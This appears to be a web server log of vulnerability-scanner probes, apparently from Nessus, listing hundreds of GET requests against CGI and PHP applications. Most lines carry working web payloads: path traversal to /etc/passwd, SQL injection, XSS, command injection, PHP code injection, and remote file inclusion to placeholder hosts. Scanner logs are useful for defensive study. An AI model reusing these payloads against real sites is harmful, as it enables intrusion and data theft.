GET /scripts/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][cmsmadesimple_nls_file_include.nasl][1]=/etc/passwd&nls[file][cmsmadesimple_nls_file_include.nasl][2]=../COPYING HTTP/1.1
GET /scripts/admin/login-default.do HTTP/1.1
GET /scripts/admin/login.html HTTP/1.1
GET /scripts/admin/login.php HTTP/1.1
GET /scripts/admin/login/ HTTP/1.1
GET /scripts/admin/login/index.php HTTP/1.1
GET /scripts/admin/o12guest.mdb HTTP/1.1
GET /scripts/admin/objects.inc.php4?Server[path]=http://xxxxxx&Server[language_file]=nessus.php HTTP/1.1
GET /scripts/admin/operators.php?view HTTP/1.1
GET /scripts/admin/plog-admin-functions.php?config[basedir]=/etc/passwd%00 HTTP/1.1
GET /scripts/admin/registry.jsp HTTP/1.1
GET /scripts/admin/remotecontrol/lsrc.server.php?wsdl HTTP/1.1
GET /scripts/admin/setup.php HTTP/1.1
GET /scripts/admin/system?wt=xml HTTP/1.1
GET /scripts/admin/templates/header.php?admin_root=http://xxxxxxxx. HTTP/1.1
GET /scripts/admin/top.php?admindir=/etc/passwd%00 HTTP/1.1
GET /scripts/admin/users.php HTTP/1.1
GET /scripts/admincp/login.php HTTP/1.1
GET /scripts/administrator/index.php HTTP/1.1
GET /scripts/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7b%7dsystem(id)%3bclass%20zZz_ADOConnection%7b%7d%2f%2f HTTP/1.1
GET /scripts/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /scripts/adxmlrpc.php HTTP/1.1
GET /scripts/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
GET /scripts/agenda.php3 HTTP/1.1
GET /scripts/ajax.php?rs=__exp__getFeedContent&rsargs[]=-99%20UNION%20SELECT%20579548134%2c2%2c1138626202%2c4%2c5%2c6%2c7%2c8%2c9%2c0%2c1%2c2%2c3%20-- HTTP/1.1
GET /scripts/al_initialize.php?alpath=/etc/passwd%00 HTTP/1.1
GET /scripts/album.pl?function=about HTTP/1.1
GET /scripts/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
GET /scripts/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login HTTP/1.1
GET /scripts/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd%00 HTTP/1.1
GET /scripts/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.1
GET /scripts/api/orders.json?search[instance_eval]=Kernel.fail%20%60id%60 HTTP/1.1
GET /scripts/apps/pbcs.dll/misc?url=../../../../../../../../../../../../windows/win.ini HTTP/1.1
GET /scripts/apps/pbcs.dll/misc?url=../../../../../../../../../../../../winnt/win.ini HTTP/1.1
GET /scripts/artifactory/webapp/home.html?0 HTTP/1.1
GET /scripts/ashnews.php?pathtoashnews=http://xxxxxxxx/ HTTP/1.1
GET /scripts/athenareg.php?pass=%20;id HTTP/1.1
GET /scripts/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/awstats.cgi HTTP/1.1
GET /scripts/awstats.pl HTTP/1.1
GET /scripts/awstatstotals.php?sort=\
GET /scripts/awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}} HTTP/1.1
GET /scripts/awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}} HTTP/1.1
GET /scripts/b2-tools/gm-2-b2.php?b2inc=http://xxxxxxxx HTTP/1.1
GET /scripts/backend/classes.php?include_path=../lib/jinzora.js%00 HTTP/1.1
GET /scripts/bandwidth/index.cgi?action=showmonth&year=<scr ipt>foo</script>&month=<scr ipt>foo</script> HTTP/1.1
GET /scripts/base_local_rules.php?dir=<scr ipt>alert('base_local_rules_xss.nasl-1410939041')</script> HTTP/1.1
GET /scripts/base_main.php HTTP/1.1
GET /scripts/base_maintenance.php HTTP/1.1
GET /scripts/base_qry_common.php?BASE_path=/etc/passwd%00 HTTP/1.1
GET /scripts/basilix.php HTTP/1.1
GET /scripts/bb-hist.sh?HISTFILE=../../../../../etc/passwd HTTP/1.1
GET /scripts/bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd HTTP/1.1
GET /scripts/bb_func_txt.php?pathToFiles=/etc/passwd%00 HTTP/1.1
GET /scripts/bblog/index.php HTTP/1.1
GET /scripts/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1
GET /scripts/billing/billingmanager_income.asp HTTP/1.1
GET /scripts/bin/html2text.php HTTP/1.1
GET /scripts/bizmail.cgi HTTP/1.1
GET /scripts/biztalkhttpreceive.dll HTTP/1.1
GET /scripts/blog.cgi?submit=ViewFile&month=01&year=2004&file=|cat%20/etc/passwd| HTTP/1.1
GET /scripts/blog.php?f=&newmessage=&newremember=1&adminuser=1&newusername=php_update_var_overwrite.nasl HTTP/1.1
GET /scripts/boarddata/data/user.idx HTTP/1.1
GET /scripts/breakcal/calendar.cgi HTTP/1.1
GET /scripts/browse.php HTTP/1.1
GET /scripts/browse_blogs.php HTTP/1.1
GET /scripts/bsml.pl?action=sm HTTP/1.1
GET /scripts/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/c/portal/login HTTP/1.1
GET /scripts/c32web.exe/GetImage?ImageName=cart32.ini%00.gif HTTP/1.1
GET /scripts/cal_cat.php?op=cats&year=2008&catview=1+UNION+SELECT+1,1410938915 HTTP/1.1
GET /scripts/cal_event.php?id=1'%20UNION%20SELECT%201%2c2%2c'calendarix_id_sql_injection.nasl'%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13-- HTTP/1.1
GET /scripts/cal_make.pl?p0=../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/cal_week.php?op=week&catview=999' HTTP/1.1
GET /scripts/calendar.php?month='%20UNION%20SELECT%201%2c1%2c'1410938932'%2c'calendarix_month_sql_injection.nasl'%2c1%20%23 HTTP/1.1
GET /scripts/calendar.php?serverPath=/etc/passwd%00 HTTP/1.1
GET /scripts/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1
GET /scripts/callboth.php?SEQ=654321&OUT=123456&IN=1410939078%40nessus%0d%0aasteridex_in_code_injection.nasl HTTP/1.1
GET /scripts/captcha.html HTTP/1.1
GET /scripts/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog HTTP/1.1
GET /scripts/cart32.exe HTTP/1.1
GET /scripts/catalog.php?action=category_show&id=' HTTP/1.1
GET /scripts/cc_guestbook.pl HTTP/1.1
GET /scripts/cfooter.php3 HTTP/1.1
GET /scripts/cgi-bin/gm-comments.cgi HTTP/1.1
GET /scripts/cgi-bin/library.cgi HTTP/1.1
GET /scripts/cgi-bin/login.cgi HTTP/1.1
GET /scripts/cgi/tseekdir.cgi?location=/etc/passwd%00 HTTP/1.1
GET /scripts/cgiforum.pl?thesection=../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/cgiip.exe/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /scripts/cgiip.exe/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /scripts/cgiwrap/cgiwrap_error_page_handling_xss.nasl HTTP/1.1
GET /scripts/chat.php HTTP/1.1
GET /scripts/chat/login.php?option=chat HTTP/1.1
GET /scripts/check_user_id.php?user_id=<scr ipt>foo</script> HTTP/1.1
GET /scripts/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=/etc/passwd%00 HTTP/1.1
GET /scripts/classes/adodbt/sql.php?classes_dir=/etc/passwd%00 HTTP/1.1
GET /scripts/clwarn.cgi HTTP/1.1
GET /scripts/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=/etc/passwd%00 HTTP/1.1
GET /scripts/comments.php HTTP/1.1
GET /scripts/comments.php?sort_by=phpwebgallery_sort_by_sql_injection.nasl HTTP/1.1
GET /scripts/commerce.cgi?page=../../../../../etc/passwd%00index.html HTTP/1.1
GET /scripts/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd%00 HTTP/1.1
GET /scripts/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/config.php?path[docroot]=/etc/passwd%00 HTTP/1.1
GET /scripts/config.php?returnpath=/etc/passwd%00 HTTP/1.1
GET /scripts/config/oramon.ini HTTP/1.1
GET /scripts/configuration/galleryConfig.txt HTTP/1.1
GET /scripts/console/login.action HTTP/1.1
GET /scripts/contact.php HTTP/1.1
GET /scripts/contacts/php?cal_dir=http://xxxxxxxx/ HTTP/1.1
GET /scripts/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd%00 HTTP/1.1
GET /scripts/content.php?get_action=display_doc&doc_file=CREDITS HTTP/1.1
GET /scripts/contrib/forms/evaluation/C_FormEvaluation.class.php?fileroot=/etc/passwd%00 HTTP/1.1
GET /scripts/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /scripts/core/api.php?t_path_core=/etc/passwd%00 HTTP/1.1
GET /scripts/core/editor.php?editor_insert_bottom=/etc/passwd HTTP/1.1
GET /scripts/corporate/webpages/login.jsp HTTP/1.1
GET /scripts/corporate/webpages/sessionexpired.jsp HTTP/1.1
GET /scripts/counter.php?count_log_file=/nessus HTTP/1.1
GET /scripts/crossdomain.xml HTTP/1.1
GET /scripts/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini HTTP/1.1
GET /scripts/csSearch.cgi?command=savesetup&setup=print%20`id` HTTP/1.1
GET /scripts/csv_db.cgi?file=|id| HTTP/1.1
GET /scripts/customer.pl HTTP/1.1
GET /scripts/cvslog.cgi?file=<scr ipt>window.alert</SCRIPT> HTTP/1.1
GET /scripts/cvsweb.cgi/ HTTP/1.1
GET /scripts/cwmail.exe HTTP/1.1
GET /scripts/data/fetch.php?page=' HTTP/1.1
GET /scripts/data/usr HTTP/1.1
GET /scripts/day.php HTTP/1.1
GET /scripts/db/users.dat HTTP/1.1
GET /scripts/db_input.php HTTP/1.1
GET /scripts/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/demos/demo.browse.php?filename=/etc/passwd HTTP/1.1
GET /scripts/detail.asp?nChannel='1 HTTP/1.1
GET /scripts/direct.php?rf=/etc/passwd%00 HTTP/1.1
GET /scripts/directory.php?dir=%3Bcat%20/etc/passwd HTTP/1.1
GET /scripts/directorypro.cgi?want=showcat&show=../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/disp_album.php?id_album=0+or+1=1 HTTP/1.1
GET /scripts/display.cgi?preftemp=temp&page=anonymous&file=|id| HTTP/1.1
GET /scripts/doc/index.php?s=/etc/passwd%00 HTTP/1.1
GET /scripts/docbuilder/top.php HTTP/1.1
GET /scripts/docman/new.php HTTP/1.1
GET /scripts/docs.php?doc=../jpgraph-1.12.1/docs/index HTTP/1.1
GET /scripts/docs/CHANGES HTTP/1.1
GET /scripts/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/doku.php HTTP/1.1
GET /scripts/download.php?language=/etc/passwd%00 HTTP/1.1
GET /scripts/dsweb/Services/User-1%22%3e%3cBODY%20ONLOAD%3dalert('xerox_docushare_dsweb_xss.nasl')%3e HTTP/1.1
GET /scripts/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://xxxxxxxxxx/ HTTP/1.1
GET /scripts/e107_admin/admin.php HTTP/1.1
GET /scripts/eclient/IDMLogon2.jsp HTTP/1.1
GET /scripts/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20 HTTP/1.1
GET /scripts/editor/efront_init_tiny_mce.php HTTP/1.1
GET /scripts/editor/filemanager/connectors/php/upload.php?Command=FileUpload&Type=File&CurrentFolder=/fckeditor_currentfolder_file_upload-1410939095.php%2e HTTP/1.1
GET /scripts/embed/day.php?path=/etc/passwd%00 HTTP/1.1
GET /scripts/empower?DB=whateverwhatever HTTP/1.1
GET /scripts/emumail.fcgi HTTP/1.1
GET /scripts/encoder.php HTTP/1.1
GET /scripts/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/ericom.min.js HTTP/1.1
GET /scripts/error.php?err=404 HTTP/1.1
GET /scripts/error.php?selected_theme=%3cscript%3ealert(uebimiau_selected_theme_xss.nasl)%3c%2fscript%3e HTTP/1.1
GET /scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl'%20UNION%20SELECT%201410938911,2031552070%20--%20 HTTP/1.1
GET /scripts/event_view.php?eid=34%20UNION%20SELECT%20729437608 HTTP/1.1
GET /scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
GET /scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini HTTP/1.1
GET /scripts/fake.cgi?arg=/dir/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
GET /scripts/fake.cgi?arg=/dir/../../../../../../../../../../../windows/win.ini HTTP/1.1
GET /scripts/fake.cgi?arg=/dir/../../../../../../../../../../../winnt/win.ini HTTP/1.1
GET /scripts/fake.cgi?arg=/dir/../../../../../../etc/passwd HTTP/1.1
GET /scripts/faq.php?action=&type=view&s=&id=-1'%20UNION%20SELECT%200%2c1340209329%2c0%2c0%2c0%2c0%2c0-- HTTP/1.1
GET /scripts/faq/index.php HTTP/1.1
GET /scripts/faxsurvey?cat%20/etc/passwd HTTP/1.1
GET /scripts/fckeditor/editor/filemanager/connectors/connector?Command=CreateFolder&Type=File&CurrentFolder=/%00/&NewFolderName=fckeditor_java_currentfolder_dos.nasl HTTP/1.1
GET /scripts/feedsplitter.php?format=../../../../../../../../../../etc/passwd%00&debug=1 HTTP/1.1
GET /scripts/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini HTTP/1.1
GET /scripts/file.php?path=/etc/passwd%00 HTTP/1.1
GET /scripts/flserv.pl?cmd=exec_flsearch&query=ftplocate_fsite_cmd_exec.nasl&fsite=|id| HTTP/1.1
GET /scripts/fm.php HTTP/1.1
GET /scripts/force-download.php HTTP/1.1
GET /scripts/form.php HTTP/1.1
GET /scripts/forum.php HTTP/1.1
GET /scripts/forum.php3?id_article=1&id_forum=-1/**/UNION/**/SELECT%201670567388-- HTTP/1.1
GET /scripts/forum.php?do=viewtopic&cat=1&topic=1&page=1?<scr ipt>foo</script HTTP/1.1
GET /scripts/forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull-- HTTP/1.1
GET /scripts/forum.php?id_article=1&id_forum=-1/**/UNION/**/SELECT%201245386774-- HTTP/1.1
GET /scripts/forum/Database/EZsiteForum.mdb HTTP/1.1
GET /scripts/forum_2.php?msg=10&return=<scr ipt>foo</script> HTTP/1.1
GET /scripts/forumdata/data/user.idx HTTP/1.1
GET /scripts/forumdisplay.php?fid=21\
GET /scripts/forums/list.page HTTP/1.1
GET /scripts/ftp/ftp.pl?dir=../../../../../../etc HTTP/1.1
GET /scripts/fxm.exe HTTP/1.1
GET /scripts/gadgets/Blog/BlogModel.php?path=/etc/passwd%00 HTTP/1.1
GET /scripts/gallery/displayCategory.php?basepath=http://xxxxxxxx HTTP/1.1
GET /scripts/generate.cgi HTTP/1.1
GET /scripts/gitweb.cgi HTTP/1.1
GET /scripts/gitweb.perl HTTP/1.1
GET /scripts/gitweb.pl HTTP/1.1
GET /scripts/gm.cgi HTTP/1.1
GET /scripts/go.cgi|id| HTTP/1.1
GET /scripts/googlesearch/GoogleSearch.php?APP[path][lib]=/etc/passwd%00 HTTP/1.1
GET /scripts/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/gtcatalog/index.php?function=custom&custom=http://xxxxxxxx/1 HTTP/1.1
GET /scripts/gtcatalog/password.inc HTTP/1.1
GET /scripts/guestbook.php HTTP/1.1
GET /scripts/guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201 HTTP/1.1
GET /scripts/guestbook/cfooter.php3 HTTP/1.1
GET /scripts/guestbook/view.php?PG=foobar HTTP/1.1
GET /scripts/help.php HTTP/1.1
GET /scripts/help.php?section='qualiteam_xcart_sql_xss.nasl HTTP/1.1
GET /scripts/help/copyright.html HTTP/1.1
GET /scripts/help/en_US/Content/master/webadmin/WebAdmin.html HTTP/1.1
GET /scripts/help/index.php?help_file=../../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/hints.pl?|id| HTTP/1.1
GET /scripts/historyFrame.html HTTP/1.1
GET /scripts/home.html?0 HTTP/1.1
GET /scripts/home/search.asp?nChannel='1 HTTP/1.1
GET /scripts/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor HTTP/1.1
GET /scripts/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/htgrep/file=index.html&hdr=/etc/passwd HTTP/1.1
GET /scripts/htmlscript?../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/htsearch.cgi HTTP/1.1
GET /scripts/htsearch?-c/nonexistent HTTP/1.1
GET /scripts/htsearch?config=&restrict=&exclude=&method=and&format=builtin-long&sort=%3cscript%3ealert('htsearch_sort_xss.nasl')%3c%2fscript%3e&words=htsearch_sort_xss.nasl HTTP/1.1
GET /scripts/htsearch?exclude=%60/etc/passwd%60 HTTP/1.1
GET /scripts/hw3.cgi?daysonly=0).system('id').( HTTP/1.1
GET /scripts/hw3.php?daysonly=0).system(id).( HTTP/1.1
GET /scripts/i-mall.cgi?p=|id| HTTP/1.1
GET /scripts/ideabox/include.php?ideaDir=http://xxxxxxxx HTTP/1.1
GET /scripts/ikonboard.cgi HTTP/1.1
GET /scripts/ikonboard.cgi?act=ST&f=1&t=1&hl=nessus&st=' HTTP/1.1
GET /scripts/image.php?src=system/config/localconfig.php HTTP/1.1
GET /scripts/inc/exif.inc.php?exif_prog=(echo%20-n%20'original_exif_prog_cmd_exec.nasl%3a%20'%3bid)%7c%7cecho HTTP/1.1
GET /scripts/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt%00 HTTP/1.1
GET /scripts/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd%00 HTTP/1.1
GET /scripts/inc/header.php/step_one.php?server_inc=http://xxxx./ HTTP/1.1
GET /scripts/inc/pipe.php?HCL_path=http://xxxxxx./ HTTP/1.1
GET /scripts/include.php HTTP/1.1
GET /scripts/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/include/error/autherror.cfm?errorcode=1&FTVAR_LINKP=%22%3e%3c%2fa%3e%3cscript%3ealert('fusetalk_mult_xss.nasl')%3c%2fscript%3e%3ca%20href%3d%22 HTTP/1.1
GET /scripts/include/error/forumerror.cfm?errorno=3 HTTP/1.1
GET /scripts/include/help.php?base=http://xxxxxxxx HTTP/1.1
GET /scripts/include/monitoring/engine/MakeXML.php?fileOreonConf=/etc/passwd%00 HTTP/1.1
GET /scripts/include/sql.php?include_path=/etc/passwd%00 HTTP/1.1
GET /scripts/include/theme.inc.php?fullpath=/etc/passwd%00 HTTP/1.1
GET /scripts/includer.cgi?template=includer_rcmdexec.nasl HTTP/1.1
GET /scripts/includes/awol-condensed.inc.php?path=http://xxxxxxxx/ HTTP/1.1
GET /scripts/includes/calendar.php?phpc_root_path=http://xxxx./ HTTP/1.1
GET /scripts/includes/config.php?relative_script_path=http://xxxxxxx HTTP/1.1
GET /scripts/includes/converter.inc.php?include_path=/etc/passwd%00 HTTP/1.1
GET /scripts/includes/db_adodb.php?baseDir=/etc/passwd%00 HTTP/1.1
GET /scripts/includes/hnmain.inc.php3?config[incdir]=http://xxxxxxxxxx/ HTTP/1.1
GET /scripts/includes/main.conf HTTP/1.1
GET /scripts/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /scripts/index HTTP/1.1
GET /scripts/index.action HTTP/1.1
GET /scripts/index.asp HTTP/1.1
GET /scripts/index.cfm HTTP/1.1
GET /scripts/index.cfm?catid=1%20SQL HTTP/1.1
GET /scripts/index.cfm?fuseaction=category.display&category_ID=' HTTP/1.1
GET /scripts/index.cgi HTTP/1.1
GET /scripts/index.html HTTP/1.1
GET /scripts/index.js%70 HTTP/1.1
GET /scripts/index.jsp HTTP/1.1
GET /scripts/index.php HTTP/1.1
GET /scripts/index.php/admin/login/ HTTP/1.1
GET /scripts/index.php/index.html HTTP/1.1
GET /scripts/index.php/login HTTP/1.1
GET /scripts/index.php?/auth/login/ HTTP/1.1
GET /scripts/index.php?CID=' HTTP/1.1
GET /scripts/index.php?_language=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/index.php?act=Arcade&do=stats&gameid=1' HTTP/1.1
GET /scripts/index.php?act=help&do=aboutOAT HTTP/1.1
GET /scripts/index.php?act=sm_window&page=event&day=-1%20UNION%20SELECT%201%2c1410938994%2c979013791%20-- HTTP/1.1
GET /scripts/index.php?action=Login&module=Users HTTP/1.1
GET /scripts/index.php?action=login&languages[Nessus]=syscp_1211.nasl&language=Nessus&langs[Nessus][0][file]=/etc/passwd HTTP/1.1
GET /scripts/index.php?action=logout&sesc=1 HTTP/1.1
GET /scripts/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/index.php?action=view&module=resourcesmodule&id=0%20UNION%20SELECT%20-1%2c'exponent_0964.nasl'%2c'Nessus%20test'%2c'O%3a8%3a%22stdClass%22%3a3%3a%7bs%3a3%3a%22mod%22%3bs%3a15%3a%22resourcesmodule%22%3bs%3a3%3a%22src%22%3bs%3a20%3a%22%40random41940ceb78dbb%22%3bs%3a3%3a%22int%22%3bs%3a0%3a%22%22%3b%7d'%2c7%2c0%2c0%2c0%2c0%2c0%2c0%20-- HTTP/1.1
GET /scripts/index.php?album=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/index.php?board=nonexistant1288236056 HTTP/1.1
GET /scripts/index.php?c=access&a=login&ref_c=nessus%22%3e%3cscript%3ealert(424716962)%3c%2fscript%3e&ref_a=projectpier_login_page_xss.nasl%22%3e%3cscript%3ealert(1460280210)%3c%2fscript%3e HTTP/1.1
GET /scripts/index.php?cat=' HTTP/1.1
GET /scripts/index.php?cat_select=<scr ipt>foo</script> HTTP/1.1
GET /scripts/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc HTTP/1.1
GET /scripts/index.php?configFile=../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/index.php?do=ext&page=http://xxxxxxxx/file HTTP/1.1
GET /scripts/index.php?doc=http://xxxxxx./foo.php HTTP/1.1
GET /scripts/index.php?edit=nonexistant1218681805 HTTP/1.1
GET /scripts/index.php?entry=' HTTP/1.1
GET /scripts/index.php?fields=CHAR(49,39,41,59,101,118,97,108,40,98,97,115,101,54,52,95,100,101,99,111,100,101,40,36,95,83,69,82,86,69,82,91,72,84,84,80,95,78,69,83,83,85,83,95,67,77,68,93,41,41,59,47,47),1 HTTP/1.1
GET /scripts/index.php?file=News&op=phpinfo HTTP/1.1
GET /scripts/index.php?gadget=../../../../../../etc/passwd%00&path=/etc HTTP/1.1
GET /scripts/index.php?gadget=Glossary&action=ViewTerm&term=%3cscript%3ealert('jaws_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1
GET /scripts/index.php?gadget=Glossary&action=view&term=%3cscript%3ealert('jaws_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1
GET /scripts/index.php?getApplication=register&checknum=1&args=null HTTP/1.1
GET /scripts/index.php?get_action=get_boot_conf HTTP/1.1
GET /scripts/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1410938905,0x3a,32428285),3,4,5,6,7,8,9,10,11,12,13,14,15,16 HTTP/1.1
GET /scripts/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1410938905,0x3a,32428285),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 HTTP/1.1
GET /scripts/index.php?id=' HTTP/1.1
GET /scripts/index.php?id='UNION/**/SELECT/**/0,0,2075535603,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- HTTP/1.1
GET /scripts/index.php?id=m1ms48leva' HTTP/1.1
GET /scripts/index.php?inc=http://xxxxxx./foo HTTP/1.1
GET /scripts/index.php?include_files[]=&include_files[query_string]=/etc/passwd HTTP/1.1
GET /scripts/index.php?kietu[url_hit]=http://xxxxxxxx/ HTTP/1.1
GET /scripts/index.php?libDir=http://xxxxxxxx HTTP/1.1
GET /scripts/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl HTTP/1.1
GET /scripts/index.php?mod_id=2&kb_ask=%3c%2ftextarea%3e%3cscript%3ealert(%22cerberus_support_center_mult_flaws.nasl%22)%3c%2fscript%3e HTTP/1.1
GET /scripts/index.php?mode=administration HTTP/1.1
GET /scripts/index.php?module=<scr ipt>foo</script> HTTP/1.1
GET /scripts/index.php?module=Navigation HTTP/1.1
GET /scripts/index.php?module=Topics&func=view&topicid=-1%20UNION%20SELECT%20null%2cnull%2c'mdpro_topicid_sql_injection.nasl-1410938971'%2cnull%2cnull%2cnull%2cnull%20-- HTTP/1.1
GET /scripts/index.php?module=ew_filemanager&type=admin&func=manager HTTP/1.1
GET /scripts/index.php?name=Your%20Account&profile=anyone%22%3E%3Cscript%3Ealert('Nessus%20was%20here')%3B%3C%2Fscript%3E HTTP/1.1
GET /scripts/index.php?op=Default&Date=200607'%20UNION%20SELECT%201%2c1472417981%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1
GET /scripts/index.php?op=ViewAlbum&albumId=-1/**/UNION/**/SELECT/**/0,1,1594149138,434134926,1,1,1,1,1--&blogId=1 HTTP/1.1
GET /scripts/index.php?op=ViewArticle&articleId=9999%2f**%2fUNION%2f**%2fSELECT%2f**%2f1410938969%2c1%2c1%2c1%2c1%2c1%2c1%2c1--&blogId=1 HTTP/1.1
GET /scripts/index.php?op=disp&filedata=c3lzdGVtKCdpZCcpOw== HTTP/1.1
GET /scripts/index.php?option=frontpage&Itemid=2|system(id)|1410938942 HTTP/1.1
GET /scripts/index.php?option=weblinks&Itemid=2&catid=-1%20UNION%20SELECT%200%2c1%2c2%2c715162723769%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11-- HTTP/1.1
GET /scripts/index.php?owa_do=base.loginForm HTTP/1.1
GET /scripts/index.php?p='nessus HTTP/1.1
GET /scripts/index.php?page=/etc/passwd%00 HTTP/1.1
GET /scripts/index.php?page=documents&doc=-99%27%20UNION%20SELECT%20null,null,%27nessus%27,%27dcpportal_sql.nasl%27,null,null,null,null,null,null,null,null-- HTTP/1.1
GET /scripts/index.php?post=../config/password HTTP/1.1
GET /scripts/index.php?req_path=http://xxxxxx./ HTTP/1.1
GET /scripts/index.php?search=%3cscript%3ealert('cmsimple_search_xss.nasl')%3b%3c%2fscript%3e&function=search HTTP/1.1
GET /scripts/index.php?search='>%3Cscript%3Ealert('autoindex_search_xss.nasl')%3B%3C%2Fscript%3E&searchMode=f HTTP/1.1
GET /scripts/index.php?search=<scr ipt>foo</script> HTTP/1.1
GET /scripts/index.php?selskin=..%2Finc%2Fboxleft.inc%00&xposbox[L][]=%2Fetc%2Fpasswd%00 HTTP/1.1
GET /scripts/index.php?sensor_program=%3cscript%3ealert('phpsysinfo_multiple_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1
GET /scripts/index.php?setLang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/index.php?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/index.php?show=/etc/passwd HTTP/1.1
GET /scripts/index.php?show=http://xxx./nessus HTTP/1.1
GET /scripts/index.php?site=../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/index.php?src=1&_common=1&time=1410938880&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/index.php?string=' HTTP/1.1
GET /scripts/index.php?template=../../../loudblog/custom/config.php%00 HTTP/1.1
GET /scripts/index.php?templates_dir=/etc/passwd%00 HTTP/1.1
GET /scripts/index.php?user_langue=../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/index.php?x=browse&category='UNION%20SELECT%20'1'%2c'2'%2c'pixelpost_category_sql_injection.nasl'%2c'1410938949'%2c'5'-- HTTP/1.1
GET /scripts/index.phtml HTTP/1.1
GET /scripts/index.phtml?mode=view&album=`id`&pic=A=10.jpg&dispsize=640&start=0 HTTP/1.1
